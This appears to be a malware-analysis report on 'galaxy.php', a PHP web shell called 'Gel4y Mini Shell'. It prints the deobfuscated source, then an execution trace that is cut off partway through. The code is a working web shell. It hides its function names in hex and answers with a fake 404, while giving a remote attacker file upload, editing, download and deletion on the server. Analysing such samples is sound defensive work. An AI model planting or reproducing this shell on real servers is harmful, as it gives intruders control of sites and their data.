PHP Malware Analysis

galaxy.php

md5: 034b8a9c132f1a2f52a299366d011995

Jump to:

Screenshot


Attributes

Emails

Environment

Execution

Input

Title


Deobfuscated PHP code

<?php

error_reporting(0);
http_response_code(404);
define("self", "Gel4y Mini Shell");
$scD = "scandir";
$fc = array("7068705f756e616d65", "70687076657273696f6e", "676574637764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", "636f7079", "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655f6765745f636f6e74656e7473", "6d6b646972", "72656e616d65", "737472746f74696d65", "68746d6c7370656369616c6368617273", "64617465", "66696c656d74696d65");
for ($i = 0; $i < count($fc); $i++) {
    $fc[$i] = nhx($fc[$i]);
}
if (isset($_GET["p"])) {
    $p = nhx($_GET["p"]);
    $fc[3](nhx($_GET["p"]));
} else {
    $p = $fc[2]();
}
function hex($str)
{
    $r = "";
    for ($i = 0; $i < strlen($str); $i++) {
        $r .= dechex(ord($str[$i]));
    }
    return $r;
}
function nhx($str)
{
    $r = "";
    $len = strlen($str) - 1;
    for ($i = 0; $i < $len; $i += 2) {
        $r .= chr(hexdec($str[$i] . $str[$i + 1]));
    }
    return $r;
}
function perms($f)
{
    $p = fileperms($f);
    if (($p & 0xc000) == 0xc000) {
        $i = 's';
    } elseif (($p & 0xa000) == 0xa000) {
        $i = 'l';
    } elseif (($p & 0x8000) == 0x8000) {
        $i = '-';
    } elseif (($p & 0x6000) == 0x6000) {
        $i = 'b';
    } elseif (($p & 0x4000) == 0x4000) {
        $i = 'd';
    } elseif (($p & 0x2000) == 0x2000) {
        $i = 'c';
    } elseif (($p & 0x1000) == 0x1000) {
        $i = 'p';
    } else {
        $i = 'u';
    }
    $i .= $p & 0x100 ? 'r' : '-';
    $i .= $p & 0x80 ? 'w' : '-';
    $i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-');
    $i .= $p & 0x20 ? 'r' : '-';
    $i .= $p & 0x10 ? 'w' : '-';
    $i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-');
    $i .= $p & 0x4 ? 'r' : '-';
    $i .= $p & 0x2 ? 'w' : '-';
    $i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-');
    return $i;
}
function a($msg, $sts = 1, $loc = "")
{
    global $p;
    $status = $sts == 1 ? "success" : "error";
    echo "<script>swal({title: \"{$status}\", text: \"{$msg}\", icon: \"{$status}\"}).then((btnClick) => {if(btnClick){document.location.href=\"?p=" . hex($p) . $loc . "\"}})</script>";
}
function deldir($d)
{
    global $fc;
    if (trim(pathinfo($d, PATHINFO_BASENAME), '.') === '') {
        return;
    }
    if ($fc[6]($d)) {
        array_map("deldir", glob($d . DIRECTORY_SEPARATOR . '{,.}*', "GLOB_N_SOWT"));
        rmdir($d);
    } else {
        unlink($d);
    }
}
?>
<!doctype html>
<!-- RandsX aka T1kus_g0t -->
<html lang="en"><head><meta name="theme-color" content="red"><meta name="viewport" content="width=device-width, initial-scale=0.60, shrink-to-fit=no"><link rel="stylesheet" href="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><title><?php 
echo "Gel4y Mini Shell";
?></title><style>.table-hover tbody tr:hover td{background:red}.table-hover tbody tr:hover td>*{color:#fff}.table>tbody>tr>*{color:#fff;vertical-align:middle}.form-control{background:0 0!important;color:#fff!important;border-radius:0}.form-control::placeholder{color:#fff;opacity:1}li{font-size:18px;margin-left:6px;list-style:none}a{color:#fff}</style><script src="//unpkg.com/sweetalert/dist/sweetalert.min.js"></script></head><body style="background-color:#000;color:#fff;font-family:serif;"><div class="bg-dark table-responsive text-light border"><div class="d-flex justify-content-between p-1"><div><h3 class="mt-2"><a href="?"><?php 
echo "Gel4y Mini Shell";
?></a></h3></div><div><span>PHP Version : <?php 
echo $fc[1]();
?></span> <br><a href="?p=<?php 
echo hex($p) . "&a=" . hex("newFile");
?>">+File</a><a href="?p=<?php 
echo hex($p) . "&a=" . hex("newDir");
?>">+Directory</a></div></div><div class="border-top table-responsive"><li>Uname : <?php 
echo $fc[0]();
?></li></div><form method="post" enctype="multipart/form-data"><div class="input-group mb-1 px-1 mt-1"><div class="custom-file"><input type="file" name="f[]" class="custom-file-input" onchange="this.form.submit()" multiple><label class="custom-file-label rounded-0 bg-transparent text-light">Choose file</label></div></div></form>
<?php 
if (isset($_FILES["f"])) {
    $n = $_FILES["f"]["name"];
    for ($i = 0; $i < count($n); $i++) {
        if ($fc[11]($_FILES["f"]["tmp_name"][$i], $n[$i])) {
            a("file uploaded successfully");
        } else {
            a("file failed to upload", 0);
        }
    }
}
if (isset($_GET["download"])) {
    header("Content-Type: application/octet-stream");
    header("Content-Transfer-Encoding: Binary");
    header("Content-Length: " . $fc[17](nhx($_GET["n"])));
    header("Content-disposition: attachment; filename=\"" . nhx($_GET["n"]) . "\"");
}
?>
</div><div class="bg-dark border table-responsive mt-2"><div class="ml-2" style="font-size:18px;"><span>Path: </span>
<?php 
$ps = $fc[4]("/(\\\\|\\/)/", $p);
foreach ($ps as $k => $v) {
    if ($k == 0 && $v == "") {
        echo "<a href=\"?p=2f\">~</a>/";
        continue;
    }
    if ($v == "") {
        continue;
    }
    echo "<a href=\"?p=";
    for ($i = 0; $i <= $k; $i++) {
        echo hex($ps[$i]);
        if ($i != $k) {
            echo "2f";
        }
    }
    echo "\">{$v}</a>/";
}
?>
</div></div><article class="bg-dark border table-responsive mt-2">
<?php 
if (!isset($_GET["a"])) {
    ?>
<table class="table table-hover table-borderless table-sm"><thead class="text-light"><tr><th>Name</th><th>Size</th><th>Permission</th><th>Action</th></tr></thead><tbody class="text-light">
<?php 
    $scD = $fc[5]($scD($p), [".", ".."]);
    foreach ($scD as $d) {
        if (!$fc[6]("{$p}/{$d}")) {
            continue;
        }
        echo "<tr><td><a href=\"?p=" . hex("{$p}/{$d}") . "\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Latest modify on " . $fc[19]("Y-m-d H:i", $fc[20]("{$p}/{$d}")) . "\"><i class=\"fa fa-fw fa-folder\"></i> {$d}</a></td><td>N/A</td><td><font color=\"" . ($fc[8]("{$p}/{$d}") ? "#00ff00" : (!$fc[9]("{$p}/{$d}") ? "red" : null)) . "\">" . perms("{$p}/{$d}") . "</font></td><td><a href=\"?p=" . hex($p) . "&a=" . hex("rename") . "&n=" . hex($d) . "&t=d\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Rename\"><i class=\"fa fa-fw fa-pencil\"></i></a><a href=\"?p=" . hex($p) . "&a=" . hex("delete") . "&n=" . hex($d) . "\" class=\"delete\" data-type=\"folder\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Delete\"><i class=\"fa fa-fw fa-trash\"></i></a></td></tr>";
    }
    foreach ($scD as $f) {
        if (!$fc[7]("{$p}/{$f}")) {
            continue;
        }
        $sz = $fc[10]("{$p}/{$f}") / 1024;
        $sz = round($sz, 3);
        $sz = $sz > 1024 ? round($sz / 1024, 2) . "MB" : $sz . "KB";
        echo "<tr><td><a href=\"?p=" . hex($p) . "&a=" . hex("view") . "&n=" . hex($f) . "\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Latest modify on " . $fc[19]("Y-m-d H:i", $fc[20]("{$p}/{$f}")) . "\"><i class=\"fa fa-fw fa-file\"></i> {$f}</a></td><td>{$sz}</td><td><font color=\"" . ($fc[8]("{$p}/{$f}") ? "#00ff00" : (!$fc[9]("{$p}/{$f}") ? "red" : null)) . "\">" . perms("{$p}/{$f}") . "</font></td><td><div class=\"d-flex justify-content-between\"><a href=\"?p=" . hex($p) . "&a=" . hex("edit") . "&n=" . hex($f) . "\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Edit\"><i class=\"fa fa-fw fa-edit\"></i></a><a href=\"?p=" . hex($p) . "&a=" . hex("rename") . "&n=" . hex($f) . "&t=f\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Rename\"><i class=\"fa fa-fw fa-pencil\"></i></a><a href=\"?p=" . hex($p) . "&n=" . hex($f) . "&download" . "\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Download\"><i class=\"fa fa-fw fa-download\"></i></a><a href=\"?p=" . hex($p) . "&a=" . hex("delete") . "&n=" . hex($f) . "\" class=\"delete\" data-type=\"file\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Delete\"><i class=\"fa fa-fw fa-trash\"></i></a></div></td></tr>";
    }
    ?></tbody></table>
<?php 
} else {
    if (isset($_GET["a"])) {
        $a = nhx($_GET["a"]);
    }
    ?>
<div class="px-2 py-2">
<?php 
    if ($a == "delete") {
        $loc = $p . '/' . nhx($_GET["n"]);
        if ($_GET["t"] == "d") {
            deldir($loc);
            if (!$fc[12]($loc)) {
                a("folder deleted successfully");
            } else {
                a("failed to delete the folder", 0);
            }
        }
        if ($_GET["t"] == "f") {
            $loc = $p . '/' . nhx($_GET["n"]);
            unlink($loc);
            if (!$fc[12]($loc)) {
                a("file deleted successfully");
            } else {
                a("file to delete the folder", 0);
            }
        }
    }
    if ($a == "newDir") {
        ?>
<h5 class="border p-1 mb-3">New folder</h5>
<form method="post"><div class="form-group"><label for="n">Name :</label><input name="n" id="n" class="form-control" autocomplete="off"></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Create</button></div></form>
<?php 
        isset($_POST["s"]) ? $fc[12]("{$p}/{$_POST["n"]}") ? a("folder name has been used", 0, "&a=" . hex("newDir")) : ($fc[15]("{$p}/{$_POST["n"]}") ? a("folder created successfully") : a("folder failed to create", 0)) : null;
    } elseif ($a == "newFile") {
        ?>
<h5 class="border p-1 mb-3">New file</h5>
<form method="post"><div class="form-group"><label for="n">File name :</label><input type="text" name="n" id="n" class="form-control" placeholder="hack.txt"></div><div class="form-group"><label for="ctn">Content :</label><textarea style="resize:none" name="ctn" id="ctn" cols="30" rows="10" class="form-control" placeholder="# Stamped By Me"></textarea></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Create</button></div></form>
<?php 
        isset($_POST["s"]) ? $fc[12]("{$p}/{$_POST["n"]}") ? a("file name has been used", 0, "&a=" . hex("newFile")) : ($fc[13]("{$p}/{$_POST["n"]}", $_POST["ctn"]) ? a("file created successfully", 1, "&a=" . hex("view") . "&n=" . hex($_POST["n"])) : a("file failed to create", 0)) : null;
    } elseif ($a == "rename") {
        ?>
<h5 class="border p-1 mb-3">Rename <?php 
        echo $_GET["t"] == "d" ? "folder" : "file";
        ?></h5>
<form method="post"><div class="form-group"><label for="n">Name :</label><input type="text" name="n" id="n" class="form-control" value="<?php 
        echo nhx($_GET["n"]);
        ?>"></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Save</button></div></form>
<?php 
        isset($_POST["s"]) ? $fc[16]($p . '/' . nhx($_GET["n"]), $_POST["n"]) ? a("successfully changed the folder name") : a("failed to change the folder name", 0) : null;
    } elseif ($a == "edit") {
        ?>
<h5 class="border p-1 mb-3">Edit file</h5>
<span>File name : <?php 
        echo nhx($_GET["n"]);
        ?></span>
<form method="post"><div class="form-group"><label for="ctn">Content :</label><textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control"><?php 
        echo $fc[18]($fc[14]($p . '/' . nhx($_GET["n"])));
        ?></textarea></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Save</button></div></form>
<?php 
        isset($_POST["s"]) ? $fc[13]($p . '/' . nhx($_GET["n"]), $_POST["ctn"]) ? a("file contents changed successfully", 1, "&a=" . hex("view") . "&n={$_GET["n"]}") : a("file contents failed to change") : null;
    } elseif ($a == "view") {
        ?>
<h5 class="border p-1 mb-3">View file</h5>
<span>File name : <?php 
        echo nhx($_GET["n"]);
        ?></span>
<div class="form-group"><label for="ctn">Content :</label><textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control" readonly><?php 
        echo $fc[18]($fc[14]($p . '/' . nhx($_GET["n"])));
        ?></textarea></div><?php 
    }
    ?></div><?php 
}
?></article><div class="bg-dark border text-center mt-2"><small>Copyright &copy; 2021 - Powered By Indonesian Darknet</small></div><script src="//code.jquery.com/jquery-3.5.1.slim.min.js"></script><script src="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.bundle.min.js" ></script><script src="//cdn.jsdelivr.net/npm/bs-custom-file-input/dist/bs-custom-file-input.min.js"></script><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('E.n();$(\'[2-m="4"]\').4();$(".l").k(j(e){e.g();h 0=$(6).5("2-0");c({b:"a",9:"o i q?",w:"D "+0+" p C B",A:7,z:7,}).y((8)=>{r(8){x 1=$(6).5("3")+"&t="+((0=="v")?"d":"f");u.s.3=1}})});',41,41,'type|buildURL|data|href|tooltip|attr|this|true|willDelete|title|warning|icon|swal||||preventDefault|let|you|function|click|delete|toggle|init|Are|will|sure|if|location||document|folder|text|const|then|dangerMode|buttons|deleted|be|This|bsCustomFileInput'.split('|'),0,{}))</script></body></html>

Execution traces

data/traces/034b8a9c132f1a2f52a299366d011995_trace-1676246275.5812.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:58:21.478990]
1	0	1	0.000166	393528
1	3	0	0.000602	478856	{main}	1		/var/www/html/uploads/galaxy.php	0	0
2	4	0	0.000620	478856	error_reporting	0		/var/www/html/uploads/galaxy.php	2	1	0
2	4	1	0.000636	478896
2	4	R			22527
2	5	0	0.000650	478856	http_response_code	0		/var/www/html/uploads/galaxy.php	3	1	404
2	5	1	0.000664	478896
2	5	R			200
2	6	0	0.000676	478856	define	0		/var/www/html/uploads/galaxy.php	4	2	'self'	'Gel4y Mini Shell'
2	6	1	0.000692	478960
2	6	R			TRUE
1		A						/var/www/html/uploads/galaxy.php	5	$scD = 'scandir'
1		A						/var/www/html/uploads/galaxy.php	6	$fc = [0 => '7068705f756e616d65', 1 => '70687076657273696f6e', 2 => '676574637764', 3 => '6368646972', 4 => '707265675f73706c6974', 5 => '61727261795f64696666', 6 => '69735f646972', 7 => '69735f66696c65', 8 => '69735f7772697461626c65', 9 => '69735f7265616461626c65', 10 => '66696c6573697a65', 11 => '636f7079', 12 => '66696c655f657869737473', 13 => '66696c655f7075745f636f6e74656e7473', 14 => '66696c655f6765745f636f6e74656e7473', 15 => '6d6b646972', 16 => '72656e616d65', 17 => '737472746f74696d65', 18 => '68746d6c7370656369616c6368617273', 19 => '64617465', 20 => '66696c656d74696d65']
1		A						/var/www/html/uploads/galaxy.php	7	$i = 0
2	7	0	0.000762	478888	nhx	1		/var/www/html/uploads/galaxy.php	8	1	'7068705f756e616d65'
2		A						/var/www/html/uploads/galaxy.php	22	$r = ''
2		A						/var/www/html/uploads/galaxy.php	23	$len = 17
2		A						/var/www/html/uploads/galaxy.php	24	$i = 0
3	8	0	0.000806	478920	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'70'
3	8	1	0.000819	478968
3	8	R			112
3	9	0	0.000832	478888	chr	0		/var/www/html/uploads/galaxy.php	25	1	112
3	9	1	0.000844	478928
3	9	R			'p'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'p'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	10	0	0.000877	478952	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'68'
3	10	1	0.000890	479000
3	10	R			104
3	11	0	0.000958	478920	chr	0		/var/www/html/uploads/galaxy.php	25	1	104
3	11	1	0.000971	478960
3	11	R			'h'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'h'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	12	0	0.001003	478952	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'70'
3	12	1	0.001015	479000
3	12	R			112
3	13	0	0.001028	478920	chr	0		/var/www/html/uploads/galaxy.php	25	1	112
3	13	1	0.001048	478960
3	13	R			'p'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'p'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	14	0	0.001079	478952	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'5f'
3	14	1	0.001091	479000
3	14	R			95
3	15	0	0.001103	478920	chr	0		/var/www/html/uploads/galaxy.php	25	1	95
3	15	1	0.001114	478960
3	15	R			'_'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= '_'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	16	0	0.001145	478952	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'75'
3	16	1	0.001157	479000
3	16	R			117
3	17	0	0.001168	478920	chr	0		/var/www/html/uploads/galaxy.php	25	1	117
3	17	1	0.001179	478960
3	17	R			'u'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'u'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	18	0	0.001209	478952	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6e'
3	18	1	0.001221	479000
3	18	R			110
3	19	0	0.001233	478920	chr	0		/var/www/html/uploads/galaxy.php	25	1	110
3	19	1	0.001244	478960
3	19	R			'n'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'n'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	20	0	0.001274	478952	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'61'
3	20	1	0.001286	479000
3	20	R			97
3	21	0	0.001298	478920	chr	0		/var/www/html/uploads/galaxy.php	25	1	97
3	21	1	0.001309	478960
3	21	R			'a'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'a'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	22	0	0.001339	478952	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6d'
3	22	1	0.001351	479000
3	22	R			109
3	23	0	0.001363	478920	chr	0		/var/www/html/uploads/galaxy.php	25	1	109
3	23	1	0.001374	478960
3	23	R			'm'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'm'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	24	0	0.001411	478960	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	24	1	0.001423	479008
3	24	R			101
3	25	0	0.001435	478928	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	25	1	0.001445	478968
3	25	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
2	7	1	0.001476	478928
2	7	R			'php_uname'
1		A						/var/www/html/uploads/galaxy.php	8	$fc[0] = 'php_uname'
1		A						/var/www/html/uploads/galaxy.php	7	$i++
2	26	0	0.001512	480264	nhx	1		/var/www/html/uploads/galaxy.php	8	1	'70687076657273696f6e'
2		A						/var/www/html/uploads/galaxy.php	22	$r = ''
2		A						/var/www/html/uploads/galaxy.php	23	$len = 19
2		A						/var/www/html/uploads/galaxy.php	24	$i = 0
3	27	0	0.001553	480296	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'70'
3	27	1	0.001565	480344
3	27	R			112
3	28	0	0.001577	480264	chr	0		/var/www/html/uploads/galaxy.php	25	1	112
3	28	1	0.001588	480304
3	28	R			'p'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'p'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	29	0	0.001618	480328	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'68'
3	29	1	0.001630	480376
3	29	R			104
3	30	0	0.001642	480296	chr	0		/var/www/html/uploads/galaxy.php	25	1	104
3	30	1	0.001653	480336
3	30	R			'h'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'h'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	31	0	0.001683	480328	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'70'
3	31	1	0.001694	480376
3	31	R			112
3	32	0	0.001706	480296	chr	0		/var/www/html/uploads/galaxy.php	25	1	112
3	32	1	0.001717	480336
3	32	R			'p'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'p'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	33	0	0.001746	480328	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'76'
3	33	1	0.001757	480376
3	33	R			118
3	34	0	0.001769	480296	chr	0		/var/www/html/uploads/galaxy.php	25	1	118
3	34	1	0.001780	480336
3	34	R			'v'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'v'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	35	0	0.001809	480328	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	35	1	0.001821	480376
3	35	R			101
3	36	0	0.001832	480296	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	36	1	0.001843	480336
3	36	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	37	0	0.001872	480328	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'72'
3	37	1	0.001884	480376
3	37	R			114
3	38	0	0.001896	480296	chr	0		/var/www/html/uploads/galaxy.php	25	1	114
3	38	1	0.001907	480336
3	38	R			'r'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'r'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	39	0	0.001936	480328	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'73'
3	39	1	0.001947	480376
3	39	R			115
3	40	0	0.001959	480296	chr	0		/var/www/html/uploads/galaxy.php	25	1	115
3	40	1	0.001970	480336
3	40	R			's'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 's'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	41	0	0.001999	480328	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'69'
3	41	1	0.002010	480376
3	41	R			105
3	42	0	0.002022	480296	chr	0		/var/www/html/uploads/galaxy.php	25	1	105
3	42	1	0.002033	480336
3	42	R			'i'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'i'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	43	0	0.002063	480336	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6f'
3	43	1	0.002074	480384
3	43	R			111
3	44	0	0.002086	480304	chr	0		/var/www/html/uploads/galaxy.php	25	1	111
3	44	1	0.002097	480344
3	44	R			'o'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'o'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	45	0	0.002131	480336	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6e'
3	45	1	0.002142	480384
3	45	R			110
3	46	0	0.002154	480304	chr	0		/var/www/html/uploads/galaxy.php	25	1	110
3	46	1	0.002165	480344
3	46	R			'n'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'n'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
2	26	1	0.002194	480304
2	26	R			'phpversion'
1		A						/var/www/html/uploads/galaxy.php	8	$fc[1] = 'phpversion'
1		A						/var/www/html/uploads/galaxy.php	7	$i++
2	47	0	0.002228	480304	nhx	1		/var/www/html/uploads/galaxy.php	8	1	'676574637764'
2		A						/var/www/html/uploads/galaxy.php	22	$r = ''
2		A						/var/www/html/uploads/galaxy.php	23	$len = 11
2		A						/var/www/html/uploads/galaxy.php	24	$i = 0
3	48	0	0.002268	480336	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'67'
3	48	1	0.002280	480384
3	48	R			103
3	49	0	0.002292	480304	chr	0		/var/www/html/uploads/galaxy.php	25	1	103
3	49	1	0.002303	480344
3	49	R			'g'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'g'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	50	0	0.002333	480368	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	50	1	0.002344	480416
3	50	R			101
3	51	0	0.002356	480336	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	51	1	0.002367	480376
3	51	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	52	0	0.002396	480368	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'74'
3	52	1	0.002408	480416
3	52	R			116
3	53	0	0.002420	480336	chr	0		/var/www/html/uploads/galaxy.php	25	1	116
3	53	1	0.002431	480376
3	53	R			't'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 't'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	54	0	0.002460	480368	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'63'
3	54	1	0.002471	480416
3	54	R			99
3	55	0	0.002483	480336	chr	0		/var/www/html/uploads/galaxy.php	25	1	99
3	55	1	0.002494	480376
3	55	R			'c'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'c'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	56	0	0.002523	480368	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'77'
3	56	1	0.002535	480416
3	56	R			119
3	57	0	0.002547	480336	chr	0		/var/www/html/uploads/galaxy.php	25	1	119
3	57	1	0.002558	480376
3	57	R			'w'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'w'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	58	0	0.002587	480368	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'64'
3	58	1	0.002598	480416
3	58	R			100
3	59	0	0.002610	480336	chr	0		/var/www/html/uploads/galaxy.php	25	1	100
3	59	1	0.002621	480376
3	59	R			'd'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'd'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
2	47	1	0.002650	480336
2	47	R			'getcwd'
1		A						/var/www/html/uploads/galaxy.php	8	$fc[2] = 'getcwd'
1		A						/var/www/html/uploads/galaxy.php	7	$i++
2	60	0	0.002683	480336	nhx	1		/var/www/html/uploads/galaxy.php	8	1	'6368646972'
2		A						/var/www/html/uploads/galaxy.php	22	$r = ''
2		A						/var/www/html/uploads/galaxy.php	23	$len = 9
2		A						/var/www/html/uploads/galaxy.php	24	$i = 0
3	61	0	0.002722	480368	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'63'
3	61	1	0.002734	480416
3	61	R			99
3	62	0	0.002746	480336	chr	0		/var/www/html/uploads/galaxy.php	25	1	99
3	62	1	0.002757	480376
3	62	R			'c'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'c'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	63	0	0.002787	480400	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'68'
3	63	1	0.002806	480448
3	63	R			104
3	64	0	0.002818	480368	chr	0		/var/www/html/uploads/galaxy.php	25	1	104
3	64	1	0.002829	480408
3	64	R			'h'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'h'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	65	0	0.002863	480400	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'64'
3	65	1	0.002875	480448
3	65	R			100
3	66	0	0.002886	480368	chr	0		/var/www/html/uploads/galaxy.php	25	1	100
3	66	1	0.002897	480408
3	66	R			'd'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'd'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	67	0	0.002926	480400	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'69'
3	67	1	0.002938	480448
3	67	R			105
3	68	0	0.002950	480368	chr	0		/var/www/html/uploads/galaxy.php	25	1	105
3	68	1	0.002961	480408
3	68	R			'i'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'i'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	69	0	0.002990	480400	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'72'
3	69	1	0.003001	480448
3	69	R			114
3	70	0	0.003013	480368	chr	0		/var/www/html/uploads/galaxy.php	25	1	114
3	70	1	0.003024	480408
3	70	R			'r'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'r'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
2	60	1	0.003053	480368
2	60	R			'chdir'
1		A						/var/www/html/uploads/galaxy.php	8	$fc[3] = 'chdir'
1		A						/var/www/html/uploads/galaxy.php	7	$i++
2	71	0	0.003086	480368	nhx	1		/var/www/html/uploads/galaxy.php	8	1	'707265675f73706c6974'
2		A						/var/www/html/uploads/galaxy.php	22	$r = ''
2		A						/var/www/html/uploads/galaxy.php	23	$len = 19
2		A						/var/www/html/uploads/galaxy.php	24	$i = 0
3	72	0	0.003126	480400	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'70'
3	72	1	0.003138	480448
3	72	R			112
3	73	0	0.003149	480368	chr	0		/var/www/html/uploads/galaxy.php	25	1	112
3	73	1	0.003160	480408
3	73	R			'p'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'p'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	74	0	0.003190	480432	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'72'
3	74	1	0.003201	480480
3	74	R			114
3	75	0	0.003214	480400	chr	0		/var/www/html/uploads/galaxy.php	25	1	114
